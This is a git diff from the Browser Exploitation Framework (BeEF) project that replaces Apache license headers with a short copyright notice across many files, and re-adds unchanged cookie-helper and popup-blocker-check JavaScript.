-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 module BeEF
diff --git a/core/api/extensions.rb b/core/api/extensions.rb
index 5d5be8cb2..37833042a 100644
--- a/core/api/extensions.rb
+++ b/core/api/extensions.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module API
diff --git a/core/api/main/configuration.rb b/core/api/main/configuration.rb
index d047068a3..119ea40c2 100644
--- a/core/api/main/configuration.rb
+++ b/core/api/main/configuration.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module API
diff --git a/core/api/main/migration.rb b/core/api/main/migration.rb
index 947503c41..298d29148 100644
--- a/core/api/main/migration.rb
+++ b/core/api/main/migration.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module API
diff --git a/core/api/main/network_stack/assethandler.rb b/core/api/main/network_stack/assethandler.rb
index d2dffe0dd..04d96c1c9 100644
--- a/core/api/main/network_stack/assethandler.rb
+++ b/core/api/main/network_stack/assethandler.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module API
diff --git a/core/api/main/server.rb b/core/api/main/server.rb
index 026a1ac5c..7ff96ff24 100644
--- a/core/api/main/server.rb
+++ b/core/api/main/server.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module API
diff --git a/core/api/main/server/hook.rb b/core/api/main/server/hook.rb
index cb34f5244..b6229c46b 100644
--- a/core/api/main/server/hook.rb
+++ b/core/api/main/server/hook.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module API
diff --git a/core/api/module.rb b/core/api/module.rb
index 5bbfc344d..a699e915f 100644
--- a/core/api/module.rb
+++ b/core/api/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module API
diff --git a/core/api/modules.rb b/core/api/modules.rb
index 1ee8b1a38..22edb88e5 100644
--- a/core/api/modules.rb
+++ b/core/api/modules.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module API
diff --git a/core/bootstrap.rb b/core/bootstrap.rb
index 3db52a26c..4244f20db 100644
--- a/core/bootstrap.rb
+++ b/core/bootstrap.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Core
diff --git a/core/core.rb b/core/core.rb
index 6dcff13f2..2adf0c1cb 100644
--- a/core/core.rb
+++ b/core/core.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Core
diff --git a/core/extension.rb b/core/extension.rb
index 7b52fe344..3c7f8dd16 100644
--- a/core/extension.rb
+++ b/core/extension.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Extension
diff --git a/core/extensions.rb b/core/extensions.rb
index f5f2026f2..5b0c0390c 100644
--- a/core/extensions.rb
+++ b/core/extensions.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Extensions
diff --git a/core/filters.rb b/core/filters.rb
index 1522bb250..be9eda17e 100644
--- a/core/filters.rb
+++ b/core/filters.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module Filters
diff --git a/core/filters/base.rb b/core/filters/base.rb
index 14492577b..8b932696a 100644
--- a/core/filters/base.rb
+++ b/core/filters/base.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Filters
diff --git a/core/filters/browser.rb b/core/filters/browser.rb
index 7dbcfdfc6..af1e3932c 100644
--- a/core/filters/browser.rb
+++ b/core/filters/browser.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Filters
diff --git a/core/filters/command.rb b/core/filters/command.rb
index dcb779a8b..fbff0b977 100644
--- a/core/filters/command.rb
+++ b/core/filters/command.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Filters
diff --git a/core/filters/http.rb b/core/filters/http.rb
index 74e316d03..b34ee47d8 100644
--- a/core/filters/http.rb
+++ b/core/filters/http.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF  
 module Filters
diff --git a/core/filters/page.rb b/core/filters/page.rb
index b75852f18..354e10877 100644
--- a/core/filters/page.rb
+++ b/core/filters/page.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
 module Filters
diff --git a/core/hbmanager.rb b/core/hbmanager.rb
index cd5eb8bc0..caea676de 100644
--- a/core/hbmanager.rb
+++ b/core/hbmanager.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 module BeEF
   module HBManager
diff --git a/core/main/client/are.js b/core/main/client/are.js
index 4cdcff84b..fbb6e53e3 100644
--- a/core/main/client/are.js
+++ b/core/main/client/are.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.are = {
   init:function(){
    var Jools = require('jools');
diff --git a/core/main/client/beef.js b/core/main/client/beef.js
index b580c936c..916097331 100644
--- a/core/main/client/beef.js
+++ b/core/main/client/beef.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * BeEF JS Library <%= @beef_version %>
  * http://beef.googlecode.com/
diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 6a680875c..c161bb6ea 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /**
  * @literal object: beef.browser
  *
diff --git a/core/main/client/browser/cookie.js b/core/main/client/browser/cookie.js
index d9b7cce98..8dcba9c97 100644
--- a/core/main/client/browser/cookie.js
+++ b/core/main/client/browser/cookie.js
@@ -1,110 +1,101 @@
-//
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
-/*!
- * @literal object: beef.browser.cookie
- * 
- * Provides fuctions for working with cookies. 
- * Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php
- * Original author unknown.
- * 
- */
-beef.browser.cookie = {
-	
-		setCookie: function (name, value, expires, path, domain, secure) 
-		{
-	
-			var today = new Date();
-			today.setTime( today.getTime() );
-	
-			if ( expires )
-			{
-				expires = expires * 1000 * 60 * 60 * 24;
-			}
-			var expires_date = new Date( today.getTime() + (expires) );
-	
-			document.cookie = name + "=" +escape( value ) +
-				( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
-				( ( path ) ? ";path=" + path : "" ) +
-				( ( domain ) ? ";domain=" + domain : "" ) +
-				( ( secure ) ? ";secure" : "" );
-		},
-
-		getCookie: function(name) 
-		{
-			var a_all_cookies = document.cookie.split( ';' );
-			var a_temp_cookie = '';
-			var cookie_name = '';
-			var cookie_value = '';
-			var b_cookie_found = false;
-			
-			for ( i = 0; i < a_all_cookies.length; i++ )
-			{
-				a_temp_cookie = a_all_cookies[i].split( '=' );
-				cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
-				if ( cookie_name == name )
-				{
-					b_cookie_found = true;
-					if ( a_temp_cookie.length > 1 )
-					{
-						cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
-					}
-					return cookie_value;
-					break;
-				}
-				a_temp_cookie = null;
-				cookie_name = '';
-			}
-			if ( !b_cookie_found )
-			{
-				return null;
-			}
-		},
-
-		deleteCookie: function (name, path, domain) 
-		{
-			if ( this.getCookie(name) ) document.cookie = name + "=" +
-			( ( path ) ? ";path=" + path : "") +
-			( ( domain ) ? ";domain=" + domain : "" ) +
-			";expires=Thu, 01-Jan-1970 00:00:01 GMT";
-		},
-		
-		hasSessionCookies: function (name)
-		{
-			var name = name || "cookie";
-			if (name == "") name = "cookie";
-			this.setCookie( name, 'none', '', '/', '', '' );
-
-			cookiesEnabled = (this.getCookie(name) == null)? false:true;
-			this.deleteCookie(name, '/', '');
-			return cookiesEnabled;
-			
-		},
-
-		hasPersistentCookies: function (name)
-		{
-			var name = name || "cookie";
-			if (name == "") name = "cookie";
-			this.setCookie( name, 'none', 1, '/', '', '' );
-
-			cookiesEnabled = (this.getCookie(name) == null)? false:true;
-			this.deleteCookie(name, '/', '');
-			return cookiesEnabled;
-			
-		}	
-					
-};
-
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+/*!
+ * @literal object: beef.browser.cookie
+ * 
+ * Provides fuctions for working with cookies. 
+ * Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php
+ * Original author unknown.
+ * 
+ */
+beef.browser.cookie = {
+	
+		setCookie: function (name, value, expires, path, domain, secure) 
+		{
+	
+			var today = new Date();
+			today.setTime( today.getTime() );
+	
+			if ( expires )
+			{
+				expires = expires * 1000 * 60 * 60 * 24;
+			}
+			var expires_date = new Date( today.getTime() + (expires) );
+	
+			document.cookie = name + "=" +escape( value ) +
+				( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
+				( ( path ) ? ";path=" + path : "" ) +
+				( ( domain ) ? ";domain=" + domain : "" ) +
+				( ( secure ) ? ";secure" : "" );
+		},
+
+		getCookie: function(name) 
+		{
+			var a_all_cookies = document.cookie.split( ';' );
+			var a_temp_cookie = '';
+			var cookie_name = '';
+			var cookie_value = '';
+			var b_cookie_found = false;
+			
+			for ( i = 0; i < a_all_cookies.length; i++ )
+			{
+				a_temp_cookie = a_all_cookies[i].split( '=' );
+				cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
+				if ( cookie_name == name )
+				{
+					b_cookie_found = true;
+					if ( a_temp_cookie.length > 1 )
+					{
+						cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
+					}
+					return cookie_value;
+					break;
+				}
+				a_temp_cookie = null;
+				cookie_name = '';
+			}
+			if ( !b_cookie_found )
+			{
+				return null;
+			}
+		},
+
+		deleteCookie: function (name, path, domain) 
+		{
+			if ( this.getCookie(name) ) document.cookie = name + "=" +
+			( ( path ) ? ";path=" + path : "") +
+			( ( domain ) ? ";domain=" + domain : "" ) +
+			";expires=Thu, 01-Jan-1970 00:00:01 GMT";
+		},
+		
+		hasSessionCookies: function (name)
+		{
+			var name = name || "cookie";
+			if (name == "") name = "cookie";
+			this.setCookie( name, 'none', '', '/', '', '' );
+
+			cookiesEnabled = (this.getCookie(name) == null)? false:true;
+			this.deleteCookie(name, '/', '');
+			return cookiesEnabled;
+			
+		},
+
+		hasPersistentCookies: function (name)
+		{
+			var name = name || "cookie";
+			if (name == "") name = "cookie";
+			this.setCookie( name, 'none', 1, '/', '', '' );
+
+			cookiesEnabled = (this.getCookie(name) == null)? false:true;
+			this.deleteCookie(name, '/', '');
+			return cookiesEnabled;
+			
+		}	
+					
+};
+
 beef.regCmp('beef.browser.cookie');
\ No newline at end of file
diff --git a/core/main/client/browser/popup.js b/core/main/client/browser/popup.js
index 40780ce7c..0efd4aa8a 100644
--- a/core/main/client/browser/popup.js
+++ b/core/main/client/browser/popup.js
@@ -1,39 +1,30 @@
-//
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
-/*!
- * @literal object: beef.browser.popup
- * 
- * Provides fuctions for working with cookies. 
- * Several functions adopted from http://davidwalsh.name/popup-block-javascript
- * Original author unknown.
- * 
- */
-beef.browser.popup = {
-	
-		blocker_enabled: function ()
-		{
-			screenParams = beef.browser.getScreenSize();
-			var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable');
-			if (popUp == null || typeof(popUp)=='undefined') {   
-			  	return true;
-			} else {   
-				popUp.close();
-				return false;
-			}
-		}
-};
-
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+/*!
+ * @literal object: beef.browser.popup
+ * 
+ * Provides fuctions for working with cookies. 
+ * Several functions adopted from http://davidwalsh.name/popup-block-javascript
+ * Original author unknown.
+ * 
+ */
+beef.browser.popup = {
+	
+		blocker_enabled: function ()
+		{
+			screenParams = beef.browser.getScreenSize();
+			var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable');
+			if (popUp == null || typeof(popUp)=='undefined') {   
+			  	return true;
+			} else {   
+				popUp.close();
+				return false;
+			}
+		}
+};
+
 beef.regCmp('beef.browser.popup');
diff --git a/core/main/client/dom.js b/core/main/client/dom.js
index 70e6bad85..20e086549 100644
--- a/core/main/client/dom.js
+++ b/core/main/client/dom.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 /*!
  * @literal object: beef.dom
  *
diff --git a/core/main/client/encode/base64.js b/core/main/client/encode/base64.js
index 94246d82b..80df54fcf 100644
--- a/core/main/client/encode/base64.js
+++ b/core/main/client/encode/base64.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 // Base64 code from http://stackoverflow.com/questions/3774622/how-to-base64-encode-inside-of-javascript/3774662#3774662
 
 beef.encode = {};
